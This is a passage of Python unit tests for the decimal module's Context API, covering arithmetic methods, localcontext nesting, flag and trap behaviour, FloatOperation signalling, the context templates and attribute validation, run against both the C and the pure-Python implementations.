self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
    # Bind the Context API tests above to the implementation in module `C`.
    decimal = C
class PyContextAPItests(ContextAPItests):
    # Bind the Context API tests above to the implementation in module `P`.
    decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
    # Bind the with-statement tests above to the implementation in module `C`.
    decimal = C
class PyContextWithStatement(ContextWithStatement):
    # Bind the with-statement tests above to the implementation in module `P`.
    decimal = P
class ContextFlags(unittest.TestCase):
    """Tests for context flag and trap behavior (results, comparisons,
    and the FloatOperation signal)."""

    def test_flags_irrelevant(self):
        # check that the result (numeric result + flags raised) of an
        # arithmetic operation doesn't depend on the current flags
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        Rounded = self.decimal.Rounded
        Underflow = self.decimal.Underflow
        Clamped = self.decimal.Clamped
        Subnormal = self.decimal.Subnormal

        def raise_error(context, flag):
            # The C implementation has no _raise_error helper: set the
            # flag directly and raise manually if it is trapped.
            if self.decimal == C:
                context.flags[flag] = True
                if context.traps[flag]:
                    raise flag
            else:
                context._raise_error(flag)

        context = Context(prec=9, Emin = -425000000, Emax = 425000000,
                          rounding=ROUND_HALF_EVEN, traps=[], flags=[])

        # operations that raise various flags, in the form (function, arglist)
        operations = [
            (context._apply, [Decimal("100E-425000010")]),
            (context.sqrt, [Decimal(2)]),
            (context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
            (context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
            (context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
            ]

        # try various flags individually, then a whole lot at once
        flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
                    [Inexact, Rounded, Underflow, Clamped, Subnormal]]

        for fn, args in operations:
            # find answer and flags raised using a clean context
            context.clear_flags()
            ans = fn(*args)
            flags = [k for k, v in context.flags.items() if v]

            for extra_flags in flagsets:
                # set flags, before calling operation
                context.clear_flags()
                for flag in extra_flags:
                    raise_error(context, flag)
                new_ans = fn(*args)

                # flags that we expect to be set after the operation
                expected_flags = list(flags)
                for flag in extra_flags:
                    if flag not in expected_flags:
                        expected_flags.append(flag)
                # sort by id() only to get a canonical order for comparison
                expected_flags.sort(key=id)

                # flags we actually got
                new_flags = [k for k,v in context.flags.items() if v]
                new_flags.sort(key=id)

                self.assertEqual(ans, new_ans,
                                 "operation produces different answers depending on flags set: " +
                                 "expected %s, got %s." % (ans, new_ans))
                self.assertEqual(new_flags, expected_flags,
                                 "operation raises different flags depending on flags set: " +
                                 "expected %s, got %s" % (expected_flags, new_flags))

    def test_flag_comparisons(self):
        # Flags/traps dicts compare by value against each other, against
        # plain dicts, and unequal against malformed values.
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        Rounded = self.decimal.Rounded

        c = Context()

        # Valid SignalDict
        self.assertNotEqual(c.flags, c.traps)
        self.assertNotEqual(c.traps, c.flags)

        c.flags = c.traps
        self.assertEqual(c.flags, c.traps)
        self.assertEqual(c.traps, c.flags)

        c.flags[Rounded] = True
        c.traps = c.flags
        self.assertEqual(c.flags, c.traps)
        self.assertEqual(c.traps, c.flags)

        d = {}
        d.update(c.flags)
        self.assertEqual(d, c.flags)
        self.assertEqual(c.flags, d)

        d[Inexact] = True
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

        # Invalid SignalDict
        d = {Inexact:False}
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

        d = ["xyz"]
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

    @requires_IEEE_754
    def test_float_operation(self):
        # FloatOperation: implicit float conversion/comparison sets the
        # flag (and raises when trapped); explicit conversion is silent.
        Decimal = self.decimal.Decimal
        FloatOperation = self.decimal.FloatOperation
        localcontext = self.decimal.localcontext

        with localcontext() as c:
            ##### trap is off by default
            self.assertFalse(c.traps[FloatOperation])

            # implicit conversion sets the flag
            c.clear_flags()
            self.assertEqual(Decimal(7.5), 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            self.assertEqual(c.create_decimal(7.5), 7.5)
            self.assertTrue(c.flags[FloatOperation])

            # explicit conversion does not set the flag
            c.clear_flags()
            x = Decimal.from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])

            # comparison sets the flag
            self.assertEqual(x, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            x = c.create_decimal_from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])
            self.assertEqual(x, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            ##### set the trap
            c.traps[FloatOperation] = True

            # implicit conversion raises
            c.clear_flags()
            self.assertRaises(FloatOperation, Decimal, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            self.assertRaises(FloatOperation, c.create_decimal, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            # explicit conversion is silent
            c.clear_flags()
            x = Decimal.from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])

            c.clear_flags()
            x = c.create_decimal_from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])

    def test_float_comparison(self):
        # Mixed Decimal/float comparisons always signal FloatOperation,
        # both untrapped (flag only) and trapped (exception).
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        FloatOperation = self.decimal.FloatOperation
        localcontext = self.decimal.localcontext

        def assert_attr(a, b, attr, context, signal=None):
            # Compare via the named dunder; expect True (or the signal),
            # and the FloatOperation flag set either way.
            context.clear_flags()
            f = getattr(a, attr)
            if signal == FloatOperation:
                self.assertRaises(signal, f, b)
            else:
                self.assertIs(f(b), True)
            self.assertTrue(context.flags[FloatOperation])

        small_d = Decimal('0.25')
        big_d = Decimal('3.0')
        small_f = 0.25
        big_f = 3.0

        zero_d = Decimal('0.0')
        neg_zero_d = Decimal('-0.0')
        zero_f = 0.0
        neg_zero_f = -0.0

        inf_d = Decimal('Infinity')
        neg_inf_d = Decimal('-Infinity')
        inf_f = float('inf')
        neg_inf_f = float('-inf')

        def doit(c, signal=None):
            # Order
            for attr in '__lt__', '__le__':
                assert_attr(small_d, big_f, attr, c, signal)

            for attr in '__gt__', '__ge__':
                assert_attr(big_d, small_f, attr, c, signal)

            # Equality (never trapped: equality is always quiet)
            assert_attr(small_d, small_f, '__eq__', c, None)

            assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
            assert_attr(neg_zero_d, zero_f, '__eq__', c, None)

            assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
            assert_attr(zero_d, zero_f, '__eq__', c, None)

            assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
            assert_attr(inf_d, inf_f, '__eq__', c, None)

            # Inequality
            assert_attr(small_d, big_f, '__ne__', c, None)

            assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)

            assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
            assert_attr(inf_d, neg_inf_f, '__ne__', c, None)

            assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)

        def test_containers(c, signal=None):
            # Container operations compare mixed types internally and
            # must therefore also set the flag (or raise when trapped).
            c.clear_flags()
            s = set([100.0, Decimal('100.0')])
            self.assertEqual(len(s), 1)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            if signal:
                self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
            else:
                s = sorted([10.0, Decimal('10.0')])
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            b = 10.0 in [Decimal('10.0'), 1.0]
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
            self.assertTrue(c.flags[FloatOperation])

        nc = Context()
        with localcontext(nc) as c:
            self.assertFalse(c.traps[FloatOperation])
            doit(c, signal=None)
            test_containers(c, signal=None)

            c.traps[FloatOperation] = True
            doit(c, signal=FloatOperation)
            test_containers(c, signal=FloatOperation)

    def test_float_operation_default(self):
        # FloatOperation is neither flagged nor trapped by default, and
        # can be enabled independently of other traps.
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        FloatOperation= self.decimal.FloatOperation

        context = Context()
        self.assertFalse(context.flags[FloatOperation])
        self.assertFalse(context.traps[FloatOperation])

        context.clear_traps()
        context.traps[Inexact] = True
        context.traps[FloatOperation] = True
        self.assertTrue(context.traps[FloatOperation])
        self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
    # Bind the flag/trap tests above to the implementation in module `C`.
    decimal = C
class PyContextFlags(ContextFlags):
    # Bind the flag/trap tests above to the implementation in module `P`.
    decimal = P
class SpecialContexts(unittest.TestCase):
    """Test the context templates."""

    def test_context_templates(self):
        # BasicContext/ExtendedContext are shared module-level templates:
        # setcontext() must install a *copy*, and template mutations must
        # be visible to later setcontext() calls.
        BasicContext = self.decimal.BasicContext
        ExtendedContext = self.decimal.ExtendedContext
        getcontext = self.decimal.getcontext
        setcontext = self.decimal.setcontext
        InvalidOperation = self.decimal.InvalidOperation
        DivisionByZero = self.decimal.DivisionByZero
        Overflow = self.decimal.Overflow
        Underflow = self.decimal.Underflow
        Clamped = self.decimal.Clamped

        assert_signals(self, BasicContext, 'traps',
            [InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
        )

        savecontext = getcontext().copy()
        basic_context_prec = BasicContext.prec
        extended_context_prec = ExtendedContext.prec

        ex = None
        try:
            BasicContext.prec = ExtendedContext.prec = 441
            for template in BasicContext, ExtendedContext:
                setcontext(template)
                c = getcontext()
                self.assertIsNot(c, template)
                self.assertEqual(c.prec, 441)
        except Exception as e:
            # Remember the exception class so restoration below always
            # runs before the failure is re-raised.
            ex = e.__class__
        finally:
            BasicContext.prec = basic_context_prec
            ExtendedContext.prec = extended_context_prec
            setcontext(savecontext)
            if ex:
                raise ex

    def test_default_context(self):
        # Changing DefaultContext does not affect the already-active
        # context, but takes effect on the next setcontext(DefaultContext).
        DefaultContext = self.decimal.DefaultContext
        BasicContext = self.decimal.BasicContext
        ExtendedContext = self.decimal.ExtendedContext
        getcontext = self.decimal.getcontext
        setcontext = self.decimal.setcontext
        InvalidOperation = self.decimal.InvalidOperation
        DivisionByZero = self.decimal.DivisionByZero
        Overflow = self.decimal.Overflow

        self.assertEqual(BasicContext.prec, 9)
        self.assertEqual(ExtendedContext.prec, 9)

        assert_signals(self, DefaultContext, 'traps',
            [InvalidOperation, DivisionByZero, Overflow]
        )

        savecontext = getcontext().copy()
        default_context_prec = DefaultContext.prec

        ex = None
        try:
            c = getcontext()
            saveprec = c.prec

            DefaultContext.prec = 961
            c = getcontext()
            self.assertEqual(c.prec, saveprec)

            setcontext(DefaultContext)
            c = getcontext()
            self.assertIsNot(c, DefaultContext)
            self.assertEqual(c.prec, 961)
        except Exception as e:
            # As above: restore the template and thread context first.
            ex = e.__class__
        finally:
            DefaultContext.prec = default_context_prec
            setcontext(savecontext)
            if ex:
                raise ex
class CSpecialContexts(SpecialContexts):
    # Bind the template tests above to the implementation in module `C`.
    decimal = C
class PySpecialContexts(SpecialContexts):
    # Bind the template tests above to the implementation in module `P`.
    decimal = P
class ContextInputValidation(unittest.TestCase):
    # NOTE: subclasses set the class attribute 'decimal' to the
    # implementation under test (C or P).
    def test_invalid_context(self):
        """Invalid values for Context attributes and constructor arguments
        must raise the documented exception types."""
        Context = self.decimal.Context
        DefaultContext = self.decimal.DefaultContext
        c = DefaultContext.copy()
        # prec, Emax
        for attr in ['prec', 'Emax']:
            setattr(c, attr, 999999)
            self.assertEqual(getattr(c, attr), 999999)
            self.assertRaises(ValueError, setattr, c, attr, -1)
            self.assertRaises(TypeError, setattr, c, attr, 'xyz')
        # Emin
        setattr(c, 'Emin', -999999)
        self.assertEqual(getattr(c, 'Emin'), -999999)
        self.assertRaises(ValueError, setattr, c, 'Emin', 1)
        self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
        # rounding: only the rounding-mode strings are accepted
        self.assertRaises(TypeError, setattr, c, 'rounding', -1)
        self.assertRaises(TypeError, setattr, c, 'rounding', 9)
        self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
        self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
        # capitals, clamp
        for attr in ['capitals', 'clamp']:
            self.assertRaises(ValueError, setattr, c, attr, -1)
            self.assertRaises(ValueError, setattr, c, attr, 2)
            self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
        # Invalid attribute
        self.assertRaises(AttributeError, setattr, c, 'emax', 100)
        # Invalid signal dict
        self.assertRaises(TypeError, setattr, c, 'flags', [])
        self.assertRaises(KeyError, setattr, c, 'flags', {})
        self.assertRaises(KeyError, setattr, c, 'traps',
                          {'InvalidOperation':0})
        # Attributes cannot be deleted
